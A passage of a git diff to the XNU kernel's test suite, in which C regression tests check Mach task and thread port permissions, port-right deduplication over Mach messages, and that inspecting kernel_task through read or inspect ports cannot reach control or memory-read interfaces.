-               kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, 0, "mach_port_allocate should succeed");
-
-               kr = mach_port_get_attributes(port, name, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&status, &statusCnt);
-               check_result(kr, type, POLY, READ, "mach_port_get_attributes", victim);
-
-               mach_port_context_t context;
-               kr = mach_port_get_context(port, name, &context);
-               check_result(kr, type, POLY, READ, "mach_port_get_context", victim);
-
-               kr = mach_port_destruct(mach_task_self(), name, 0, 0);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct");
-       }
-
-       ipc_info_space_basic_t sinfo;
-       kr = mach_port_space_basic_info(port, &sinfo);
-       check_result(kr, type, INSPECT, INSPECT, "mach_port_space_basic_info", victim);
-
-       /************ MACH_PORT_ALLOCATE ************/
-
-       mach_port_t new_port = MACH_PORT_NULL;
-       kr = mach_port_allocate(port, MACH_PORT_RIGHT_RECEIVE, &new_port);
-       check_result(kr, type, FULL, FULL, "mach_port_allocate", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_destruct(port, new_port, 0, 0);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct");
-       }
-
-       /************ INSPECT INTERFACES ************/
-       int counts[2];
-       mach_msg_type_number_t size = TASK_INSPECT_BASIC_COUNTS_COUNT;
-       kr = task_inspect(port, TASK_INSPECT_BASIC_COUNTS, counts, &size);
-       check_result(kr, type, INSPECT, INSPECT, "task_inspect", victim);
-
-       /************ TASK_SET_SPECIAL_PORT ************/
-
-       if (type == FULL) {
-               new_port = MACH_PORT_NULL;
-               kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &new_port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_allocate");
-               kr = mach_port_insert_right(mach_task_self(), new_port, new_port, MACH_MSG_TYPE_MAKE_SEND);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_insert_right");
-
-               mach_port_t backup;
-               kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &backup);
-               check_result(kr, type, POLY, FULL, "task_get_special_port", victim);
-               kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, new_port);
-               check_result(kr, type, FULL, FULL, "task_set_special_port", victim);
-               kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, backup);
-               check_result(kr, type, FULL, FULL, "task_set_special_port", victim);
-
-               kr = mach_port_deallocate(mach_task_self(), new_port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-               mach_port_mod_refs(mach_task_self(), new_port, MACH_PORT_RIGHT_RECEIVE, -1);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_mod_refs");
-       }
-       /************ TASK_THREADS ************/
-       thread_array_t th_list;
-       mach_msg_type_number_t th_cnt = 0;
-
-       kr = task_threads(port, &th_list, &th_cnt);
-       check_result(kr, type, POLY, INSPECT, "task_threads", victim);
-
-       /* Skip thread ports tests if task_threads() fails */
-       if (kr != KERN_SUCCESS) {
-               return;
-       }
-
-       /************ THREAD_GET_SPECIAL_PORT ************/
-       mach_port_t special = MACH_PORT_NULL;
-
-       switch (type) {
-       case FULL:
-               kr = thread_get_special_port(th_list[0], THREAD_KERNEL_PORT, &special);
-               break;
-       case READ:
-               kr = thread_get_special_port(th_list[0], THREAD_READ_PORT, &special);
-               break;
-       case INSPECT:
-               kr = thread_get_special_port(th_list[0], THREAD_INSPECT_PORT, &special);
-               break;
-       default:
-               break;
-       }
-
-       T_QUIET; T_EXPECT_EQ(special, th_list[0], "thread_get_special_port should match task_threads");
-
-       kr = mach_port_deallocate(mach_task_self(), special);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       for (unsigned int i = 0; i < th_cnt; i++) {
-               test_thread_port(th_list[i], type, victim); /* polymorphic */
-               kr = mach_port_deallocate(mach_task_self(), th_list[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-}
-
-static void
-test_get_child_port(int with_sleep)
-{
-       pid_t child_pid;
-       kern_return_t kr;
-       mach_port_name_t tr, ti, tp, tn;
-
-       child_pid = fork();
-
-       if (child_pid < 0) {
-               T_FAIL("fork failed in test_get_child_port.");
-       }
-
-       if (child_pid == 0) {
-               while (1) {
-                       sleep(10);
-               }
-       }
-
-       kr = task_for_pid(mach_task_self(), child_pid, &tp);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tfpFail++;
-       }
-
-       kr = task_read_for_pid(mach_task_self(), child_pid, &tr);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_trfpFail++;
-       }
-
-       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tifpFail++;
-       }
-
-       kr = task_name_for_pid(mach_task_self(), child_pid, &tn);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tnfpFail++;
-       }
-
-       kr = mach_port_deallocate(mach_task_self(), tp);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tr);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), ti);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tn);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kill(child_pid, SIGKILL);
-       int status;
-       wait(&status);
-}
-
-static void
-test_child_exec()
-{
-       pid_t child_pid;
-       kern_return_t kr;
-       mach_port_name_t tr2, ti2, tp2, tn2;
-
-       child_pid = fork();
-
-       if (child_pid < 0) {
-               T_FAIL("fork failed in test_child_exec.");
-       }
-
-       if (child_pid == 0) {
-               execve("/bin/bash", NULL, NULL);
-       }
-
-       sleep(10);
-
-       kr = task_name_for_pid(mach_task_self(), child_pid, &tn2);
-       test_task_port(tn2, NAME);
-
-       kr = task_for_pid(mach_task_self(), child_pid, &tp2);
-       test_task_port(tp2, FULL);
-
-       kr = task_read_for_pid(mach_task_self(), child_pid, &tr2);
-       test_task_port(tr2, READ);
-
-       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti2);
-       test_task_port(ti2, INSPECT);
-
-       kr = mach_port_deallocate(mach_task_self(), tp2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tr2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), ti2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tn2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kill(child_pid, SIGKILL);
-       int status;
-       wait(&status);
-}
-
-static void *
-thread_run()
-{
-       pthread_mutex_lock(&g_lock);
-       pthread_mutex_unlock(&g_lock);
-
-       pthread_exit(NULL);
-
-       return NULL;
-}
-
-#ifdef T_NOCODESIGN
-#define TEST_NAME inspect_read_port_nocodesign
-#else
-#define TEST_NAME inspect_read_port
-#endif
-
-T_DECL(TEST_NAME, "inspect and read port test", T_META_ASROOT(true))
-{
-       kern_return_t kr;
-       pid_t pid = 0;
-       mach_port_t port = MACH_PORT_NULL;
-
-       kr = pid_for_task(mach_task_self(), &pid);
-       T_EXPECT_MACH_SUCCESS(kr, "pid_for_task: My Pid = %d", pid);
-
-#ifdef T_NOCODESIGN
-       T_LOG("Running as non-platform binary...\n");
-#else
-       T_LOG("Running as platform binary...\n");
-#endif
-
-       kr = task_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_for_pid(mach_task_self..): %u", port);
-       T_EXPECT_EQ(port, mach_task_self(), "task_for_pid == mach_task_self");
-       test_task_port(port, FULL);
-
-       port = MACH_PORT_NULL;
-       kr = task_read_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_read_for_pid(mach_task_self..): read port = %u", port);
-       test_task_port(port, READ);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_inspect_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_inspect_for_pid(mach_task_self..): inspect port = %u", port);
-       test_task_port(port, INSPECT);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_name_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_name_for_pid(mach_task_self..): name port = %u", port);
-       test_task_port(port, NAME);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_read_for_pid(mach_task_self(), 0, &port);
-       T_EXPECT_NE(kr, 0, "task_read_for_pid for kernel should fail");
-
-       /* task_read_for_pid loop, check for leaks */
-       for (int i = 0; i < 0x1000; i++) {
-               kr = task_read_for_pid(mach_task_self(), pid, &port);
-               test_task_port(port, READ);
-               kr = mach_port_deallocate(mach_task_self(), port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       /* task_inspect_for_pid loop, check for leaks */
-       for (int i = 0; i < 0x1000; i++) {
-               kr = task_inspect_for_pid(mach_task_self(), pid, &port);
-               test_task_port(port, INSPECT);
-               kr = mach_port_deallocate(mach_task_self(), port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       /* fork-exec a child process */
-       test_child_exec();
-
-       /* fork, get full/read/inspect/name port for the child then kill it */
-       for (int i = 0; i < 10; i++) {
-               test_get_child_port(TRUE);
-       }
-
-       T_LOG("tfp fail: %d, trfp fail: %d, tifp fail: %d, tnfp fail: %d, TOTAL: 10\n",
-           g_tfpFail, g_trfpFail, g_tifpFail, g_tnfpFail);
-
-
-       /* task thread loop, check for leaks */
-       thread_array_t th_list;
-       mach_msg_type_number_t th_cnt;
-       pthread_t thread;
-
-       pthread_mutex_init(&g_lock, NULL);
-       pthread_mutex_lock(&g_lock);
-
-       for (unsigned i = 0; i < 0x100; i++) {
-               pthread_create(&thread, NULL, thread_run, NULL);
-       }
-
-       for (unsigned i = 0; i < 0x1000; i++) {
-               kr = task_threads(mach_task_self(), &th_list, &th_cnt);
-               T_QUIET; T_ASSERT_EQ(th_cnt, 0x101, "257 threads");
-
-               for (unsigned j = 0; j < th_cnt; j++) {
-                       kr = mach_port_deallocate(mach_task_self(), th_list[j]);
-                       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-               }
-       }
-       pthread_mutex_unlock(&g_lock);
-
-       /* processor_set_tasks_with_flavor */
-
-       processor_set_name_array_t psets;
-       processor_set_t        pset;
-       task_array_t tasks;
-       mach_msg_type_number_t pcnt, tcnt;
-       mach_port_t host = mach_host_self();
-
-       kr = host_processor_sets(host, &psets, &pcnt);
-       kr = host_processor_set_priv(host, psets[0], &pset);
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_CONTROL, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_CONTROL should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], FULL);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_READ should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], READ);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_INSPECT, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_INSPECT should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], INSPECT);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_NAME, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_NAME should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], NAME);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       // Cleanup
-       for (unsigned int i = 0; i < pcnt; i++) {
-               kr = mach_port_deallocate(mach_task_self(), psets[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = mach_port_deallocate(mach_task_self(), pset);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-}
diff --git a/tests/ipc_mach_port.c b/tests/ipc_mach_port.c
new file mode 100644 (file)
index 0000000..b17dbc0
--- /dev/null
@@ -0,0 +1,190 @@
+#include <darwintest.h>
+#include <darwintest_multiprocess.h>
+#include <launch.h>
+#include <servers/bootstrap.h>
+#include <sys/sysctl.h>
+#include "exc_helpers.h"
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+#pragma mark - helpers
+
+#define SERVICE_NAME  "com.apple.xnu.test.mach_port"
+
+struct one_port_msg {
+       mach_msg_header_t          header;
+       mach_msg_body_t            body;
+       mach_msg_port_descriptor_t port_descriptor;
+       mach_msg_trailer_t         trailer;            // subtract this when sending
+};
+
+static mach_port_t
+server_checkin(void)
+{
+       mach_port_t mp;
+       kern_return_t kr;
+
+       kr = bootstrap_check_in(bootstrap_port, SERVICE_NAME, &mp);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in");
+       return mp;
+}
+
+static mach_port_t
+server_lookup(void)
+{
+       mach_port_t mp;
+       kern_return_t kr;
+
+       kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &mp);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_look_up");
+       return mp;
+}
+
+static mach_port_t
+make_sr_port(void)
+{
+       mach_port_options_t opts = {
+               .flags = MPO_INSERT_SEND_RIGHT,
+       };
+       kern_return_t kr;
+       mach_port_t port;
+
+       kr = mach_port_construct(mach_task_self(), &opts, 0ull, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_construct");
+       return port;
+}
+
+static void
+destroy_port(mach_port_t port, bool receive, int srights)
+{
+       kern_return_t kr;
+
+       if (srights) {
+               kr = mach_port_mod_refs(mach_task_self(), port,
+                   MACH_PORT_RIGHT_SEND, -srights);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "srights -= %d", srights);
+       }
+       if (receive) {
+               kr = mach_port_mod_refs(mach_task_self(), port,
+                   MACH_PORT_RIGHT_RECEIVE, -1);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive -= 1");
+       }
+}
+
+static void
+send_port(
+       mach_msg_id_t        id,
+       mach_port_t          dest,
+       mach_port_t          right,
+       mach_msg_type_name_t disp)
+{
+       struct one_port_msg msg = {
+               .header = {
+                       .msgh_remote_port = dest,
+                       .msgh_bits        = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND,
+           0, MACH_MSG_TYPE_MOVE_SEND, MACH_MSGH_BITS_COMPLEX),
+                       .msgh_id          = id,
+                       .msgh_size        = offsetof(struct one_port_msg, trailer),
+               },
+               .body = {
+                       .msgh_descriptor_count = 1,
+               },
+               .port_descriptor = {
+                       .name        = right,
+                       .disposition = disp,
+                       .type        = MACH_MSG_PORT_DESCRIPTOR,
+               },
+       };
+       kern_return_t kr;
+
+       kr = mach_msg(&msg.header, MACH_SEND_MSG | MACH_SEND_TIMEOUT,
+           msg.header.msgh_size, 0, MACH_PORT_NULL, 10000, 0);
+
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "send(%d)", id);
+}
+
+#pragma mark - basic test about right deduplication
+
+static mach_port_t
+receive_port(
+       mach_msg_id_t        expected_id,
+       mach_port_t          rcv_port,
+       mach_msg_type_name_t expected_disp)
+{
+       struct one_port_msg msg = { };
+       kern_return_t kr;
+
+       T_LOG("waiting for message %d", expected_id);
+       kr = mach_msg(&msg.header, MACH_RCV_MSG, 0,
+           sizeof(msg), rcv_port, 0, 0);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive(%d)", expected_id);
+       T_QUIET; T_ASSERT_EQ(msg.header.msgh_id, expected_id, "message id matches");
+       T_QUIET; T_ASSERT_NE(msg.header.msgh_bits & MACH_MSGH_BITS_COMPLEX, 0,
+           "message is complex");
+       T_QUIET; T_ASSERT_EQ(msg.body.msgh_descriptor_count, 1, "message has one right");
+       T_QUIET; T_ASSERT_EQ(msg.port_descriptor.disposition, expected_disp,
+           "port has right disposition");
+       return msg.port_descriptor.name;
+}
+
+T_HELPER_DECL(right_dedup_server, "right_dedup_server")
+{
+       mach_port_t svc_port = server_checkin();
+       mach_port_t ports[3];
+
+       ports[0] = receive_port(1, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       ports[1] = receive_port(2, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[2] = receive_port(3, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       T_ASSERT_EQ(ports[0], ports[1], "receive, send, send");
+       T_ASSERT_EQ(ports[0], ports[2], "receive, send, send");
+       destroy_port(ports[0], true, 2);
+
+       ports[0] = receive_port(4, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[1] = receive_port(5, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       ports[2] = receive_port(6, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       T_ASSERT_EQ(ports[0], ports[1], "send, receive, send");
+       T_ASSERT_EQ(ports[0], ports[2], "send, receive, send");
+       destroy_port(ports[0], true, 2);
+
+       ports[0] = receive_port(7, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[1] = receive_port(8, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[2] = receive_port(9, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       T_ASSERT_EQ(ports[0], ports[1], "send, send, receive");
+       T_ASSERT_EQ(ports[0], ports[2], "send, send, receive");
+       destroy_port(ports[0], true, 2);
+
+       T_END;
+}
+
+T_HELPER_DECL(right_dedup_client, "right_dedup_client")
+{
+       mach_port_t svc_port = server_lookup();
+       mach_port_t port;
+
+       port = make_sr_port();
+       send_port(1, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       send_port(2, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(3, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+
+       port = make_sr_port();
+       send_port(4, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(5, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       send_port(6, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+
+       port = make_sr_port();
+       send_port(7, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(8, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+       send_port(9, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+}
+
+T_DECL(right_dedup, "make sure right deduplication works")
+{
+       dt_helper_t helpers[] = {
+               dt_launchd_helper_domain("com.apple.xnu.test.mach_port.plist",
+           "right_dedup_server", NULL, LAUNCH_SYSTEM_DOMAIN),
+               dt_fork_helper("right_dedup_client"),
+       };
+       dt_run_helpers(helpers, 2, 600);
+}
index 6aacdccc04aa0a52ebc58535ab9a0875dd888a80..e6de871d95104592158000b737c211d3bd05d135 100644 (file)
@@ -19,6 +19,7 @@
 #include <stdint.h>
 
 #include "ktrace_helpers.h"
+#include "test_utils.h"
 
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.ktrace"),
@@ -623,25 +624,6 @@ static const uint32_t noprocfilt_evts[EXP_KERNEL_EVENTS] = {
        BSDDBG_CODE(DBG_BSD_KDEBUG_TEST, 19),
 };
 
-static bool
-is_development_kernel(void)
-{
-       static dispatch_once_t is_development_once;
-       static bool is_development;
-
-       dispatch_once(&is_development_once, ^{
-               int dev;
-               size_t dev_size = sizeof(dev);
-
-               T_QUIET;
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev,
-               &dev_size, NULL, 0), NULL);
-               is_development = (dev != 0);
-       });
-
-       return is_development;
-}
-
 static void
 expect_event(struct trace_point *tp, const char *name, unsigned int *events,
     const uint32_t *event_ids, size_t event_ids_len)
diff --git a/tests/kernel_inspection.c b/tests/kernel_inspection.c
new file mode 100644 (file)
index 0000000..6fa087d
--- /dev/null
@@ -0,0 +1,207 @@
+#ifdef T_NAMESPACE
+#undef T_NAMESPACE
+#endif
+
+#include <darwintest.h>
+
+#include <mach/host_priv.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/mach_vm.h>
+#include <mach/processor_set.h>
+#include <mach/task.h>
+#include <sys/sysctl.h>
+#include <mach_debug/ipc_info.h>
+#include <unistd.h>
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"),
+    T_META_RUN_CONCURRENTLY(true));
+
+/*
+ * Attempt to inspect kernel_task using a task_inspect_t.  Interact with the
+ * kernel in the same way top(1) and lsmp(1) do.
+ */
+
+static int found_kernel_task = 0;
+
+static void
+check_secure_kernel(void)
+{
+       int secure_kern = 0;
+       size_t secure_kern_size = sizeof(secure_kern);
+
+       T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern,
+           &secure_kern_size, NULL, 0), NULL);
+
+       if (secure_kern) {
+               T_SKIP("secure kernel: processor_set_tasks will not return kernel_task");
+       }
+}
+
+static void
+attempt_kernel_inspection(task_t task)
+{
+       pid_t pid = (pid_t)-1;
+       mach_msg_type_number_t i, count, thcnt;
+       struct task_basic_info_64 ti;
+       thread_act_array_t threads;
+
+       if (pid_for_task(task, &pid)) {
+               return;
+       }
+
+       T_QUIET; T_LOG("Checking pid %d", pid);
+
+       if (pid != 0) {
+               return;
+       }
+
+       T_LOG("found kernel_task, attempting to inspect");
+       found_kernel_task++;
+
+       count = TASK_BASIC_INFO_64_COUNT;
+       T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti,
+           &count), "task_info(... TASK_BASIC_INFO_64 ...)");
+
+       T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads");
+       T_LOG("Found %d kernel threads.", thcnt);
+       for (i = 0; i < thcnt; i++) {
+               kern_return_t kr;
+               thread_basic_info_data_t basic_info;
+               mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT;
+
+               kr = thread_info(threads[i], THREAD_BASIC_INFO,
+                   (thread_info_t)&basic_info, &bi_count);
+               /*
+                * Ignore threads that have gone away.
+                */
+               if (kr == MACH_SEND_INVALID_DEST) {
+                       T_LOG("ignoring thread that has been destroyed");
+                       continue;
+               }
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)");
+
+               /* Now try out READ (skip eval) interfaces on kernel thread */
+               mach_msg_type_number_t msk_count = EXC_TYPES_COUNT;
+               exception_mask_t masks[EXC_TYPES_COUNT];
+               ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+               exception_behavior_t behaviors[EXC_TYPES_COUNT];
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+               kr = thread_get_exception_ports_info(threads[i], EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info() on kernel thread: 0x%x", kr);
+
+               /* READ (with eval) interfaces should fail */
+               mach_port_t voucher;
+               kr = thread_get_mach_voucher(threads[i], 0, &voucher);
+               T_QUIET; T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "thread_get_mach_voucher() should fail with KERN_INVALID_ARGUMENT");
+
+               (void)mach_port_deallocate(mach_task_self(), threads[i]);
+       }
+       mach_vm_deallocate(mach_task_self(),
+           (mach_vm_address_t)(uintptr_t)threads,
+           thcnt * sizeof(*threads));
+
+       ipc_info_space_basic_t basic_info;
+       T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info");
+
+       ipc_info_space_t info_space;
+       ipc_info_name_array_t table;
+       ipc_info_tree_name_array_t tree;
+       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
+       T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table,
+           &tblcnt, &tree, &treecnt), "mach_port_space_info");
+       if (tblcnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)table,
+                   tblcnt * sizeof(*table));
+       }
+       if (treecnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tree,
+                   treecnt * sizeof(*tree));
+       }
+
+       /* Now try out READ (skip eval) interfaces on kernel task */
+       mach_msg_type_number_t msk_count = EXC_TYPES_COUNT;
+       exception_mask_t masks[EXC_TYPES_COUNT];
+       ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+       kern_return_t kr = task_get_exception_ports_info(task, EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info() on kernel_task: 0x%x", kr);
+
+       /* READ (with eval) interfaces should fail */
+       vm_offset_t data;
+       mach_msg_type_number_t cnt;
+       mach_vm_address_t addr = 0x10000000; /* can be whatever, the call should fail before getting to VM */
+
+       kr = mach_vm_read(task, (mach_vm_address_t)addr, 8, &data, &cnt);
+       T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "mach_vm_read() should fail with KERN_INVALID_ARGUMENT");
+
+       mach_port_t voucher;
+       kr = task_get_mach_voucher(task, 0, &voucher);
+       T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_get_mach_voucher() should fail with KERN_INVALID_TASK");
+
+       /* Control interfaces should absolutely fail */
+       kr = task_set_mach_voucher(task, mach_task_self()); /* voucher arg is unused, can be whatever port */
+       T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_set_mach_voucher() should fail with KERN_INVALID_TASK");
+}
+
+T_DECL(inspect_kernel_task,
+    "ensure that kernel task can be inspected",
+    T_META_CHECK_LEAKS(false),
+    T_META_ASROOT(true))
+{
+       processor_set_name_array_t psets;
+       processor_set_t pset;
+       task_array_t tasks;
+       mach_msg_type_number_t i, j, tcnt, pcnt = 0;
+       mach_port_t self = mach_host_self();
+
+       check_secure_kernel();
+
+       T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt),
+           NULL);
+
+       for (i = 0; i < pcnt; i++) {
+               T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL);
+               T_LOG("Checking pset %d/%d", i, pcnt - 1);
+
+               tcnt = 0;
+               T_LOG("Attempting kernel inspection with control port...");
+               T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL);
+
+               for (j = 0; j < tcnt; j++) {
+                       attempt_kernel_inspection(tasks[j]);
+                       mach_port_deallocate(self, tasks[j]);
+               }
+
+               /* free tasks array */
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tasks,
+                   tcnt * sizeof(*tasks));
+
+               T_LOG("Attempting kernel inspection with read port...");
+               T_ASSERT_MACH_SUCCESS(processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt), NULL);
+
+               for (j = 0; j < tcnt; j++) {
+                       attempt_kernel_inspection(tasks[j]);
+                       mach_port_deallocate(self, tasks[j]);
+               }
+
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tasks,
+                   tcnt * sizeof(*tasks));
+
+               mach_port_deallocate(mach_task_self(), pset);
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_vm_deallocate(mach_task_self(),
+           (mach_vm_address_t)(uintptr_t)psets,
+           pcnt * sizeof(*psets));
+
